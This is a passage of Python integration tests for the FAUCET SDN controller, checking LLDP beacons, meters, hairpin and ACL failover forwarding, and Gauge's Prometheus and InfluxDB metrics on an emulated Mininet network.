tcpdump_filter = 'ether proto 0x88cc'
timeout = 5 * 3
tcpdump_txt = self.tcpdump_helper(
first_host, tcpdump_filter, [
lambda: first_host.cmd('sleep %u' % timeout)],
timeout=timeout, vflags='-vv', packets=1)
oui_prefix = ''.join(self.FAUCET_MAC.split(':')[:3])
faucet_lldp_dp_id_attr = '%2.2x' % 1
expected_lldp_dp_id = ''.join((
oui_prefix,
faucet_lldp_dp_id_attr,
binascii.hexlify(str(self.dpid).encode('UTF-8')).decode()))
for lldp_required in (
r'%s > 01:80:c2:00:00:0e, ethertype LLDP' % self.FAUCET_MAC,
r'Application type \[voice\] \(0x01\), Flags \[Tagged\]Vlan id 50',
r'System Name TLV \(5\), length 6: faucet',
r'Port Description TLV \(4\), length 10: first_port',
self.wireshark_payload_format(expected_lldp_dp_id)):
self.assertTrue(
re.search(lldp_required, tcpdump_txt),
msg='%s: %s' % (lldp_required, tcpdump_txt))
class FaucetLLDPIntervalTest(FaucetUntaggedTest):
NUM_FAUCET_CONTROLLERS = 1
CONFIG = """
lldp_beacon:
send_interval: 10
max_per_interval: 5
interfaces:
%(port_1)d:
native_vlan: 100
lldp_beacon:
enable: True
system_name: "faucet"
port_descr: "first_port"
org_tlvs:
- {oui: 0x12bb, subtype: 2, info: "01406500"}
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host = self.hosts_name_ordered()[0]
tcpdump_filter = 'ether proto 0x88cc'
interval = 10
timeout = interval * 3
tcpdump_txt = self.tcpdump_helper(
first_host, tcpdump_filter, [
lambda: first_host.cmd('sleep %u' % timeout)],
# output epoch secs
timeout=timeout, vflags='-tt', packets=2)
timestamps = re.findall(r'(\d+)\.\d+ [0-9a-f:]+ \> [0-9a-f:]+', tcpdump_txt)
timestamps = [int(timestamp) for timestamp in timestamps]
self.assertTrue(timestamps[1] - timestamps[0] >= interval, msg=tcpdump_txt)
class FaucetUntaggedLLDPDefaultFallbackTest(FaucetUntaggedTest):
CONFIG = """
lldp_beacon:
send_interval: 5
max_per_interval: 5
interfaces:
%(port_1)d:
native_vlan: 100
lldp_beacon:
enable: True
org_tlvs:
- {oui: 0x12bb, subtype: 2, info: "01406500"}
"""
def test_untagged(self):
first_host = self.hosts_name_ordered()[0]
tcpdump_filter = 'ether proto 0x88cc'
timeout = 5 * 3
tcpdump_txt = self.tcpdump_helper(
first_host, tcpdump_filter, [
lambda: first_host.cmd('sleep %u' % timeout)],
timeout=timeout, vflags='-vv', packets=1)
for lldp_required in (
r'%s > 01:80:c2:00:00:0e, ethertype LLDP' % self.FAUCET_MAC,
r'Application type \[voice\] \(0x01\), Flags \[Tagged\]Vlan id 50',
r'System Name TLV \(5\), length 8: faucet-1',
r'Port Description TLV \(4\), length [1-9]: b%u' % self.port_map['port_1']):
self.assertTrue(
re.search(lldp_required, tcpdump_txt),
msg='%s: %s' % (lldp_required, tcpdump_txt))
class FaucetUntaggedMeterParseTest(FaucetUntaggedTest):
REQUIRES_METERS = True
OVS_TYPE = 'user'
CONFIG_GLOBAL = """
meters:
lossymeter:
meter_id: 1
entry:
flags: "KBPS"
bands:
[
{
type: "DROP",
rate: 100
}
]
acls:
lossyacl:
- rule:
actions:
meter: lossymeter
allow: 1
vlans:
100:
description: "untagged"
"""
def get_gauge_watcher_config(self):
return """
port_stats:
dps: ['%s']
type: 'port_stats'
interval: 5
db: 'stats_file'
port_state:
dps: ['%s']
type: 'port_state'
interval: 5
db: 'state_file'
meter_stats:
dps: ['%s']
type: 'meter_stats'
interval: 5
db: 'meter_file'
meter_stats_prom:
dps: ['%s']
type: 'meter_stats'
db: 'prometheus'
interval: 5
""" % (self.DP_NAME, self.DP_NAME, self.DP_NAME, self.DP_NAME)
GAUGE_CONFIG_DBS = """
prometheus:
type: 'prometheus'
prometheus_addr: '::1'
prometheus_port: %(gauge_prom_port)d
"""
config_ports = {'gauge_prom_port': None}
def _get_gauge_meter_config(self, faucet_config_file,
monitor_stats_file,
monitor_state_file,
monitor_meter_stats_file):
"""Build Gauge Meter config."""
return """
faucet_configs:
- %s
watchers:
%s
dbs:
stats_file:
type: 'text'
file: %s
state_file:
type: 'text'
file: %s
meter_file:
type: 'text'
file: %s
%s
""" % (faucet_config_file, self.get_gauge_watcher_config(),
monitor_stats_file, monitor_state_file, monitor_meter_stats_file,
self.GAUGE_CONFIG_DBS)
def _init_gauge_config(self):
gauge_config = self._get_gauge_meter_config(
self.faucet_config_path,
self.monitor_stats_file,
self.monitor_state_file,
self.monitor_meter_stats_file)
if self.config_ports:
gauge_config = gauge_config % self.config_ports
self._write_yaml_conf(self.gauge_config_path, yaml.safe_load(gauge_config))
def test_untagged(self):
"""All hosts on the same untagged VLAN should have connectivity."""
# TODO: userspace DP port status not reliable.
self.ping_all_when_learned()
class FaucetUntaggedApplyMeterTest(FaucetUntaggedMeterParseTest):
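    """Test that traffic through a meter ACL increments the meter band byte counters."""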
CONFIG = """
interfaces:
%(port_1)d:
acl_in: lossyacl
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
super().test_untagged()
first_host, second_host = self.hosts_name_ordered()[:2]
error('metered ping flood: %s' % first_host.cmd(
'ping -c 1000 -f %s' % second_host.IP()))
        # Require the meter band byte counter to be nonzero.
self.wait_until_matching_lines_from_file(
r'.+faucet-1-1-byte-band-count.+[1-9].+',
self.monitor_meter_stats_file)
meter_labels = {
'dp_id': self.dpid,
'dp_name': self.DP_NAME,
'meter_id': 1
}
byte_band_count = self.scrape_prometheus_var(
'of_meter_byte_band_count', labels=meter_labels, controller=self.gauge_controller.name)
self.assertTrue(byte_band_count)
class FaucetUntaggedMeterAddTest(FaucetUntaggedMeterParseTest):
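    """Test that meters can be added and removed via config reload."""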
NUM_FAUCET_CONTROLLERS = 1
def test_untagged(self):
super().test_untagged()
conf = self._get_faucet_conf()
conf['meters']['lossymeter2'] = {
'meter_id': 2,
'entry': {
'flags': ['PKTPS'],
'bands': [{'rate': '1000', 'type': 'DROP'}]
},
}
conf['acls']['lossyacl2'] = [{
'rule': {
'actions': {
'allow': 1,
'meter': 'lossymeter2'
}
}
}]
port_conf = conf['dps'][self.DP_NAME]['interfaces'][self.port_map['port_2']]
port_conf['acls_in'] = ['lossyacl2']
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=True, change_expected=True, hup=True)
self.wait_until_matching_lines_from_file(
r'.+\'meter_id\'\: 2+',
self.get_matching_meters_on_dpid(self.dpid))
port_conf['acls_in'] = []
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=True, change_expected=True)
self.wait_until_no_matching_lines_from_file(
r'.+\'meter_id\'\: 2+',
self.get_matching_meters_on_dpid(self.dpid))
class FaucetUntaggedMeterModTest(FaucetUntaggedMeterParseTest):
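    """Test that a meter's flags can be modified via config reload."""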
def test_untagged(self):
super().test_untagged()
conf = self._get_faucet_conf()
conf['dps'][self.DP_NAME]['interfaces'][self.port_map['port_1']]['acls_in'] = ['lossyacl']
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=True, change_expected=True, hup=True)
self.wait_until_matching_lines_from_file(
r'.+KBPS+',
self.get_matching_meters_on_dpid(self.dpid))
conf['meters']['lossymeter']['entry']['flags'] = ['PKTPS']
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=False, change_expected=True, hup=True)
self.wait_until_matching_lines_from_file(
r'.+PKTPS+',
self.get_matching_meters_on_dpid(self.dpid))
class FaucetUntaggedHairpinTest(FaucetUntaggedTest):
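    """Test hairpin forwarding between macvlan interfaces on the same switch port."""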
NETNS = True
CONFIG = """
interfaces:
%(port_1)d:
hairpin: True
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
# Create macvlan interfaces, with one in a separate namespace,
# to force traffic between them to be hairpinned via FAUCET.
first_host, second_host = self.hosts_name_ordered()[:2]
macvlan1_intf = 'macvlan1'
macvlan1_ipv4 = '10.0.0.100'
macvlan2_intf = 'macvlan2'
macvlan2_ipv4 = '10.0.0.101'
self.add_macvlan(first_host, macvlan1_intf, ipa=macvlan1_ipv4, mode='vepa')
self.add_macvlan(first_host, macvlan2_intf, mode='vepa')
macvlan2_mac = self.get_host_intf_mac(first_host, macvlan2_intf)
netns = self.hostns(first_host)
setup_cmds = []
setup_cmds.extend(
['ip link set %s netns %s' % (macvlan2_intf, netns)])
for exec_cmd in (
('ip address add %s/24 brd + dev %s' % (
macvlan2_ipv4, macvlan2_intf),
'ip link set %s up' % macvlan2_intf)):
setup_cmds.append('ip netns exec %s %s' % (netns, exec_cmd))
self.quiet_commands(first_host, setup_cmds)
self.one_ipv4_ping(first_host, macvlan2_ipv4, intf=macvlan1_ipv4)
self.one_ipv4_ping(first_host, second_host.IP())
# Verify OUTPUT:IN_PORT flood rules are exercised.
self.wait_nonzero_packet_count_flow(
{'in_port': self.port_map['port_1'],
'dl_dst': 'ff:ff:ff:ff:ff:ff'},
table_id=self._FLOOD_TABLE, actions=['OUTPUT:IN_PORT'])
self.wait_nonzero_packet_count_flow(
{'in_port': self.port_map['port_1'],
'dl_dst': macvlan2_mac},
table_id=self._ETH_DST_HAIRPIN_TABLE, actions=['OUTPUT:IN_PORT'])
class FaucetUntaggedGroupHairpinTest(FaucetUntaggedHairpinTest):
CONFIG = """
group_table: True
interfaces:
%(port_1)d:
hairpin: True
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
class FaucetUntaggedTcpIPv4IperfTest(FaucetUntaggedTest):
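    """Test that TCP iperf throughput between two untagged IPv4 hosts meets the minimum, including after port flaps."""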
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[:2]
first_host_ip = ipaddress.ip_address(first_host.IP())
second_host_ip = ipaddress.ip_address(second_host.IP())
for _ in range(3):
self.ping_all_when_learned()
self.verify_iperf_min(
((first_host, self.port_map['port_1']),
(second_host, self.port_map['port_2'])),
MIN_MBPS, first_host_ip, second_host_ip,
sync_counters_func=lambda: self.one_ipv4_ping(first_host, second_host_ip))
self.flap_all_switch_ports()
class FaucetUntaggedTcpIPv6IperfTest(FaucetUntaggedTest):
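    """Test that TCP iperf throughput between two untagged IPv6 hosts meets the minimum, including after port flaps."""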
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[:2]
first_host_ip = ipaddress.ip_interface('fc00::1:1/112')
second_host_ip = ipaddress.ip_interface('fc00::1:2/112')
self.add_host_ipv6_address(first_host, first_host_ip)
self.add_host_ipv6_address(second_host, second_host_ip)
for _ in range(3):
self.ping_all_when_learned()
self.verify_iperf_min(
((first_host, self.port_map['port_1']),
(second_host, self.port_map['port_2'])),
MIN_MBPS, first_host_ip.ip, second_host_ip.ip,
sync_counters_func=lambda: self.one_ipv6_ping(first_host, second_host_ip.ip))
self.flap_all_switch_ports()
class FaucetSanityTest(FaucetUntaggedTest):
"""Sanity test - make sure test environment is correct before running all tess."""
def test_scapy_fuzz(self):
# Scapy 2.4.5 has issues with 'fuzz' generation
# so black-list that version with a test
exception = False
try:
scapy.all.send(scapy.all.fuzz(scapy.all.Ether())) # pylint: disable=no-member
except Exception as e: # pylint: disable=broad-except
error('%s:' % self._test_name(), e)
exception = True
self.assertFalse(exception, 'Scapy threw an exception in send(fuzz())')
def test_ryu_config(self):
varstr = ', '.join(self.scrape_prometheus(var='ryu_config'))
self.assertTrue('echo_request_interval"} 10.0' in varstr)
self.assertTrue('maximum_unreplied_echo_requests"} 5.0' in varstr)
def verify_dp_port_healthy(self, dp_port, retries=5, min_mbps=MIN_MBPS):
for _ in range(retries):
port_desc = self.get_port_desc_from_dpid(self.dpid, dp_port)
port_name = port_desc['name']
port_state = port_desc['state']
port_config = port_desc['config']
port_speed_mbps = (port_desc['curr_speed'] * 1e3) / 1e6
error('DP %u is %s, at %u mbps\n' % (dp_port, port_name, port_speed_mbps))
if port_speed_mbps < min_mbps:
error('port speed %u below minimum %u mbps\n' % (
port_speed_mbps, min_mbps))
elif port_config != 0:
error('port config %u must be 0 (all clear)' % port_config)
elif port_state not in (0, 4):
error('state %u must be 0 (all flags clear or live)\n' % (
port_state))
else:
return
time.sleep(1)
self.fail('DP port %u not healthy (%s)' % (dp_port, port_desc))
def test_portmap(self):
prom_desc = self.scrape_prometheus(var='of_dp_desc_stats')
self.assertIsNotNone(prom_desc, msg='Cannot scrape of_dp_desc_stats')
error('DP: %s\n' % prom_desc[0])
error('port_map: %s\n' % self.port_map)
for i, host in enumerate(self.hosts_name_ordered(), start=1):
in_port = 'port_%u' % i
dp_port = self.port_map[in_port]
if dp_port in self.switch_map:
error('verifying cabling for %s: host %s -> dp %u\n' % (
in_port, self.switch_map[dp_port], dp_port))
else:
error('verifying host %s -> dp %s\n' % (
in_port, dp_port))
self.verify_dp_port_healthy(dp_port)
self.require_host_learned(host, in_port=dp_port)
learned = self.prom_macs_learned()
self.assertEqual(
len(self.hosts_name_ordered()), len(learned),
msg='test requires exactly %u hosts learned (got %s)' % (
len(self.hosts_name_ordered()), learned))
def test_listening(self):
msg_template = (
            'Processes listening on test interfaces, or on all interfaces, may interfere with tests. '
'Please deconfigure them (e.g. configure interface as "unmanaged"):\n\n%s')
controller = self._get_controller()
ss_out = controller.cmd('ss -lnep').splitlines()
listening_all_re = re.compile(r'^.+\s+(\*:\d+|:::\d+)\s+(:+\*|\*:\*).+$')
listening_all = [line for line in ss_out if listening_all_re.match(line)]
for test_intf in list(self.switch_map.values()):
int_re = re.compile(r'^.+\b%s\b.+$' % test_intf)
listening_int = [line for line in ss_out if int_re.match(line)]
self.assertFalse(
len(listening_int),
msg=(msg_template % '\n'.join(listening_int)))
if listening_all:
print('Warning: %s' % (msg_template % '\n'.join(listening_all)))
def test_silence(self):
# Make all test hosts silent and ensure we hear no other packets.
for host in self.hosts_name_ordered():
self.host_drop_all_ips(host)
host.cmd('echo 1 > /proc/sys/net/ipv6/conf/%s/disable_ipv6' % host.defaultIntf())
for host in self.hosts_name_ordered():
tcpdump_filter = ''
tcpdump_txt = self.tcpdump_helper(
host, tcpdump_filter, [], timeout=10, vflags='-vv', packets=1)
self.assertTrue(
self.tcpdump_rx_packets(tcpdump_txt, 0),
msg='got unexpected packet from test switch: %s' % tcpdump_txt)
class FaucetUntaggedPrometheusGaugeTest(FaucetUntaggedTest):
"""Testing Gauge Prometheus"""
GAUGE_CONFIG_DBS = """
prometheus:
type: 'prometheus'
prometheus_addr: '::1'
prometheus_port: %(gauge_prom_port)d
"""
config_ports = {'gauge_prom_port': None}
def get_gauge_watcher_config(self):
return """
port_stats:
dps: ['%s']
type: 'port_stats'
interval: 5
db: 'prometheus'
port_state:
dps: ['%s']
type: 'port_state'
interval: 5
db: 'prometheus'
flow_table:
dps: ['%s']
type: 'flow_table'
interval: 5
db: 'prometheus'
""" % (self.DP_NAME, self.DP_NAME, self.DP_NAME)
def _start_gauge_check(self):
if not self.gauge_controller.listen_port(self.config_ports['gauge_prom_port']):
return 'gauge not listening on prometheus port'
return None
def test_untagged(self):
self.wait_dp_status(1, controller=self.gauge_controller.name)
self.assertIsNotNone(self.scrape_prometheus_var(
'faucet_pbr_version', any_labels=True, controller=self.gauge_controller.name, retries=3))
conf = self._get_faucet_conf()
cookie = conf['dps'][self.DP_NAME]['cookie']
if not self.wait_ports_updating(self.port_map.keys(), self.PORT_VARS):
self.fail(msg='Gauge Prometheus port counters not increasing')
for _ in range(self.DB_TIMEOUT * 3):
updated_counters = True
for host in self.hosts_name_ordered():
host_labels = {
'dp_id': self.dpid,
'dp_name': self.DP_NAME,
'cookie': cookie,
'eth_dst': host.MAC(),
'inst_count': str(1),
'table_id': str(self._ETH_DST_TABLE),
'vlan': str(100),
'vlan_vid': str(4196)
}
packet_count = self.scrape_prometheus_var(
'flow_packet_count_eth_dst', labels=host_labels, controller=self.gauge_controller.name)
byte_count = self.scrape_prometheus_var(
'flow_byte_count_eth_dst', labels=host_labels, controller=self.gauge_controller.name)
if packet_count is None or packet_count == 0:
updated_counters = False
if byte_count is None or byte_count == 0:
updated_counters = False
if updated_counters:
return
time.sleep(1)
self.fail(msg='Gauge Prometheus flow counters not increasing')
class FaucetUntaggedInfluxTest(FaucetUntaggedTest):
"""Basic untagged VLAN test with Influx."""
GAUGE_CONFIG_DBS = """
influx:
type: 'influx'
influx_db: 'faucet'
influx_host: '127.0.0.1'
influx_port: %(gauge_influx_port)d
influx_user: 'faucet'
influx_pwd: ''
influx_retries: 1
""" + """
influx_timeout: %u
""" % FaucetUntaggedTest.DB_TIMEOUT
config_ports = {'gauge_influx_port': None}
influx_log = None
server_thread = None
server = None
def get_gauge_watcher_config(self):
return """
port_stats:
dps: ['%s']
type: 'port_stats'
interval: 2
db: 'influx'
port_state:
dps: ['%s']
type: 'port_state'
interval: 2
db: 'influx'
flow_table:
dps: ['%s']
type: 'flow_table'
interval: 2
db: 'influx'
""" % (self.DP_NAME, self.DP_NAME, self.DP_NAME)
def setup_influx(self):
self.influx_log = os.path.join(self.tmpdir, 'influx.log')
if self.server:
self.server.influx_log = self.influx_log
self.server.timeout = self.DB_TIMEOUT
def setUp(self):
self.handler = InfluxPostHandler
super().setUp()
self.setup_influx()
def tearDown(self, ignore_oferrors=False):
if self.server:
self.server.shutdown()
self.server.socket.close()
super().tearDown(ignore_oferrors=ignore_oferrors)
def _wait_error_shipping(self, timeout=None):
if timeout is None:
timeout = self.DB_TIMEOUT * 3 * 2
self.wait_until_matching_lines_from_gauge_log_files(
r'.+error shipping.+', timeout=timeout)
def _verify_influx_log(self, retries=3):
self.assertTrue(os.path.exists(self.influx_log))
expected_vars = {
'dropped_in', 'dropped_out', 'bytes_out', 'flow_packet_count',
'errors_in', 'errors_out', 'bytes_in', 'flow_byte_count',
'port_state_reason', 'packets_in', 'packets_out'}
observed_vars = set()
for _ in range(retries):
with open(self.influx_log) as influx_log:
influx_log_lines = influx_log.readlines()
for point_line in influx_log_lines:
point_fields = point_line.strip().split()
self.assertEqual(3, len(point_fields), msg=point_fields)
ts_name, value_field, _ = point_fields
value = float(value_field.split('=')[1])
ts_name_fields = ts_name.split(',')
self.assertGreater(len(ts_name_fields), 1)
observed_vars.add(ts_name_fields[0])
label_values = {}
for label_value in ts_name_fields[1:]:
label, value = label_value.split('=')
label_values[label] = value
if ts_name.startswith('flow'):
self.assertTrue('inst_count' in label_values, msg=point_line)
if 'vlan_vid' in label_values:
self.assertEqual(
                                int(label_values['vlan']), int(label_values['vlan_vid']) ^ 0x1000)
if expected_vars == observed_vars:
break
time.sleep(1)
self.assertEqual(expected_vars, observed_vars)
self.verify_no_exception(self.env[self.gauge_controller.name]['GAUGE_EXCEPTION_LOG'])
def _wait_influx_log(self):
for _ in range(self.DB_TIMEOUT * 3):
if os.path.exists(self.influx_log):
return
time.sleep(1)
def _start_gauge_check(self):
if self.server_thread:
return None
influx_port = self.config_ports['gauge_influx_port']
try:
self.server = QuietHTTPServer(
(mininet_test_util.LOCALHOST, influx_port),
self.handler) # pytype: disable=attribute-error
self.server.timeout = self.DB_TIMEOUT
self.server_thread = threading.Thread(
target=self.server.serve_forever)
self.server_thread.daemon = True
self.server_thread.start()
return None
except socket.error as err:
return 'cannot start Influx test server: %s' % err
def test_untagged(self):
self.ping_all_when_learned()
self.hup_controller(self.gauge_controller.name)
self.flap_all_switch_ports()
self._wait_influx_log()
self._verify_influx_log()
class FaucetUntaggedMultiDBWatcherTest(
FaucetUntaggedInfluxTest, FaucetUntaggedPrometheusGaugeTest):
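    """Test Gauge watchers that write to both Prometheus and InfluxDB."""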
GAUGE_CONFIG_DBS = """
prometheus:
type: 'prometheus'
prometheus_addr: '::1'
prometheus_port: %(gauge_prom_port)d
influx:
type: 'influx'
influx_db: 'faucet'
influx_host: '127.0.0.1'
influx_port: %(gauge_influx_port)d
influx_user: 'faucet'
influx_pwd: ''
influx_retries: 1
""" + """
influx_timeout: %u
""" % FaucetUntaggedTest.DB_TIMEOUT
config_ports = {
'gauge_prom_port': None,
'gauge_influx_port': None}
def get_gauge_watcher_config(self):
return """
port_stats:
dps: ['%s']
type: 'port_stats'
interval: 5
dbs: ['prometheus', 'influx']
port_state:
dps: ['%s']
type: 'port_state'
interval: 5
dbs: ['prometheus', 'influx']
flow_table:
dps: ['%s']
type: 'flow_table'
interval: 5
dbs: ['prometheus', 'influx']
""" % (self.DP_NAME, self.DP_NAME, self.DP_NAME)
@staticmethod
def test_tagged():
return
def test_untagged(self):
self.wait_dp_status(1, controller=self.gauge_controller.name)
self.assertTrue(self.wait_ports_updating(self.port_map.keys(), self.PORT_VARS))
self.ping_all_when_learned()
self.hup_controller(controller=self.gauge_controller.name)
self.flap_all_switch_ports()
self._wait_influx_log()
self._verify_influx_log()
class FaucetUntaggedInfluxDownTest(FaucetUntaggedInfluxTest):
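    """Test that Gauge reports errors shipping to InfluxDB when no InfluxDB server is running."""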
def _start_gauge_check(self):
return None
def test_untagged(self):
self.ping_all_when_learned()
self._wait_error_shipping()
self.verify_no_exception(self.env[self.gauge_controller.name]['GAUGE_EXCEPTION_LOG'])
class FaucetUntaggedInfluxUnreachableTest(FaucetUntaggedInfluxTest):
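    """Test that Gauge reports errors shipping to InfluxDB when the server address is unreachable."""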
GAUGE_CONFIG_DBS = """
influx:
type: 'influx'
influx_db: 'faucet'
influx_host: '127.0.0.2'
influx_port: %(gauge_influx_port)d
influx_user: 'faucet'
influx_pwd: ''
influx_timeout: 2
"""
def _start_gauge_check(self):
return None
def test_untagged(self):
self.gauge_controller.cmd(
'route add 127.0.0.2 gw 127.0.0.1 lo')
self.ping_all_when_learned()
self._wait_error_shipping()
self.verify_no_exception(self.env[self.gauge_controller.name]['GAUGE_EXCEPTION_LOG'])
class FaucetSingleUntaggedInfluxTooSlowTest(FaucetUntaggedInfluxTest):
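    """Test that Gauge reports errors shipping to InfluxDB when the server responds too slowly."""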
def setUp(self):
self.handler = SlowInfluxPostHandler
super().setUp()
self.setup_influx()
def test_untagged(self):
self.ping_all_when_learned()
self._wait_influx_log()
self.assertTrue(os.path.exists(self.influx_log))
self._wait_error_shipping()
self.verify_no_exception(self.env[self.gauge_controller.name]['GAUGE_EXCEPTION_LOG'])
class FaucetNailedForwardingTest(FaucetUntaggedTest):
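    """Test static forwarding entirely via ACL output actions, without relying on L2 learning."""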
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_dst: "0e:00:00:00:02:02"
actions:
output:
port: %(port_2)d
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.2"
actions:
output:
port: %(port_2)d
- rule:
actions:
allow: 0
2:
- rule:
dl_dst: "0e:00:00:00:01:01"
actions:
output:
port: %(port_1)d
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.1"
actions:
output:
port: %(port_1)d
- rule:
actions:
allow: 0
3:
- rule:
actions:
allow: 0
4:
- rule:
actions:
allow: 0
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
acl_in: 2
%(port_3)d:
native_vlan: 100
acl_in: 3
%(port_4)d:
native_vlan: 100
acl_in: 4
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
first_host.setMAC('0e:00:00:00:01:01')
second_host.setMAC('0e:00:00:00:02:02')
self.one_ipv4_ping(
first_host, second_host.IP(), require_host_learned=False)
self.one_ipv4_ping(
second_host, first_host.IP(), require_host_learned=False)
class FaucetNailedForwardingOrderedTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_dst: "0e:00:00:00:02:02"
actions:
output:
- port: %(port_2)d
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.2"
actions:
output:
- port: %(port_2)d
- rule:
actions:
allow: 0
2:
- rule:
dl_dst: "0e:00:00:00:01:01"
actions:
output:
- port: %(port_1)d
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.1"
actions:
output:
- port: %(port_1)d
- rule:
actions:
allow: 0
3:
- rule:
actions:
allow: 0
4:
- rule:
actions:
allow: 0
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
acl_in: 2
%(port_3)d:
native_vlan: 100
acl_in: 3
%(port_4)d:
native_vlan: 100
acl_in: 4
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
first_host.setMAC('0e:00:00:00:01:01')
second_host.setMAC('0e:00:00:00:02:02')
self.one_ipv4_ping(
first_host, second_host.IP(), require_host_learned=False)
self.one_ipv4_ping(
second_host, first_host.IP(), require_host_learned=False)
class FaucetNailedFailoverForwardingTest(FaucetNailedForwardingTest):
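    """Test ACL failover output: traffic is delivered via the backup port when the primary goes down."""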
NUM_FAUCET_CONTROLLERS = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_dst: "0e:00:00:00:02:02"
actions:
output:
failover:
group_id: 1001
ports: [%(port_2)d, %(port_3)d]
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.2"
actions:
output:
failover:
group_id: 1002
ports: [%(port_2)d, %(port_3)d]
- rule:
actions:
allow: 0
2:
- rule:
dl_dst: "0e:00:00:00:01:01"
actions:
output:
port: %(port_1)d
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.1"
actions:
output:
port: %(port_1)d
- rule:
actions:
allow: 0
3:
- rule:
dl_dst: "0e:00:00:00:01:01"
actions:
output:
port: %(port_1)d
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.1"
actions:
output:
port: %(port_1)d
- rule:
actions:
allow: 0
4:
- rule:
actions:
allow: 0
"""
def test_untagged(self):
first_host, second_host, third_host = self.hosts_name_ordered()[0:3]
first_host.setMAC('0e:00:00:00:01:01')
second_host.setMAC('0e:00:00:00:02:02')
third_host.setMAC('0e:00:00:00:02:02')
third_host.setIP(second_host.IP())
self.one_ipv4_ping(
first_host, second_host.IP(), require_host_learned=False)
self.one_ipv4_ping(
second_host, first_host.IP(), require_host_learned=False)
self.set_port_down(self.port_map['port_2'])
self.one_ipv4_ping(
first_host, third_host.IP(), require_host_learned=False)
self.one_ipv4_ping(
third_host, first_host.IP(), require_host_learned=False)
class FaucetNailedFailoverForwardingOrderedTest(FaucetNailedForwardingTest):
NUM_FAUCET_CONTROLLERS = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_dst: "0e:00:00:00:02:02"
actions:
output:
- failover:
group_id: 1001
ports: [%(port_2)d, %(port_3)d]
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.2"
actions:
output:
- failover:
group_id: 1002
ports: [%(port_2)d, %(port_3)d]
- rule:
actions:
allow: 0
2:
- rule:
dl_dst: "0e:00:00:00:01:01"
actions:
output:
- port: %(port_1)d
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.1"
actions:
output:
- port: %(port_1)d
- rule:
actions:
allow: 0
3:
- rule:
dl_dst: "0e:00:00:00:01:01"
actions:
output:
- port: %(port_1)d
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.1"
actions:
output:
- port: %(port_1)d
- rule:
actions:
allow: 0
4:
- rule:
actions:
allow: 0
"""
def test_untagged(self):
first_host, second_host, third_host = self.hosts_name_ordered()[0:3]
first_host.setMAC('0e:00:00:00:01:01')
second_host.setMAC('0e:00:00:00:02:02')
third_host.setMAC('0e:00:00:00:02:02')
third_host.setIP(second_host.IP())
self.one_ipv4_ping(
first_host, second_host.IP(), require_host_learned=False)
self.one_ipv4_ping(
second_host, first_host.IP(), require_host_learned=False)
self.set_port_down(self.port_map['port_2'])
self.one_ipv4_ping(
first_host, third_host.IP(), require_host_learned=False)
self.one_ipv4_ping(
third_host, first_host.IP(), require_host_learned=False)
class FaucetUntaggedLLDPBlockedTest(FaucetUntaggedTest):
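    """Test that LLDP frames from hosts are not forwarded."""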
def test_untagged(self):
self.ping_all_when_learned()
self.verify_lldp_blocked()
# Verify 802.1x flood block triggered.
self.wait_nonzero_packet_count_flow(
{'dl_dst': '01:80:c2:00:00:00/ff:ff:ff:ff:ff:f0'},
table_id=self._FLOOD_TABLE)
class FaucetUntaggedCDPTest(FaucetUntaggedTest):
def test_untagged(self):
self.ping_all_when_learned()
self.verify_cdp_blocked()
class FaucetTaggedAndUntaggedSameVlanTest(FaucetTest):
"""Test mixture of tagged and untagged hosts on the same VLAN."""
N_TAGGED = 1
N_UNTAGGED = 3
LINKS_PER_HOST = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "mixed"
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def setUp(self):
super().setUp()
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=1, n_untagged=3, links_per_host=self.LINKS_PER_HOST,
hw_dpid=self.hw_dpid)
self.start_net()
def test_untagged(self):
"""Test connectivity including after port flapping."""
self.ping_all_when_learned()
